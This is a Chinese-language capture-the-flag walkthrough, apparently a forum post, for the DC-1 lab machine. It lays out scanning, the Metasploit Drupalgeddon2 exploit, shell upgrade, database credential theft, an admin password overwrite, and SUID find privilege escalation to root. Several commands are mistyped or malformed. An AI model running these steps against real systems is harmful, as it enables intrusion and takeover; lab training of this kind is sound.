DC-1靶机渗透教程
DC-1本机IP地址:192.168.138.128设置中,网络适配器调成NAT
Netdiscover -r 192.168.138.128(或192.168.138.1/24) 扫描靶机地址
靶机IP:192.168.138.129
扫描靶机存活端口Nmap-sV -p- 192.168.138.129可以看到http服务的80端口查看80端口返回kali终端输入whatweb -v 192.168.138.129 (扫描一些详细信息)扫描完成后再输入Msfconsole 进入msf6进入msfconsole输入下面指令进入模块msf6 >use exploit/unix/webapp/drupal_drupalgeddon2(exploit→漏洞模块攻击的代码)后续输入msf6 exploit(unix/webapp/drupal_drupalgeddon2) >show options如下再输入msf6 exploit(unix/webapp/drupal_drupalgeddon2) >show payloads 再输入msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.138.129msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit sysinfoshellIdpython -c 'import pty; pty.spawn("/bin/bash")'(必背)输入ls查看所有文件ls发现flag1值啦输入cat flag1.txt (cat意思“打开”)打开flag1.txt文件瞅瞅就行了
find . -name "set*"find . -name "set*" ./sites/default/settings.php cat ./sites/default/settings.php mysql -udbuser -pR0ck3t进入数据库mysql> show databases;mysql> use drupaldb mysql> shop tables;mysql> show tables;mysql> select * from usermysql> select * from users\G;
mysql> exitfind . -name "*hash*"./scripts/password-hash.sh
./scripts/password-hash.sh 123456再进数据库mysql> use drupaldbmysql> update users set pass=’略’where name="admin";flag3在网站中,使用修改后的密码登录网站后就能发现。
cat /etc/passwordcat /etc/passwdcd /home/flag4lscat flag4.txtflag4也就出来了
接下来使用find提权
find / -perm -u-s -type f 2>/dev/null
find ./ -exec “/bin/sh”
获得root权限查看root目录中的thefinalflag.txt
End
页:
[1]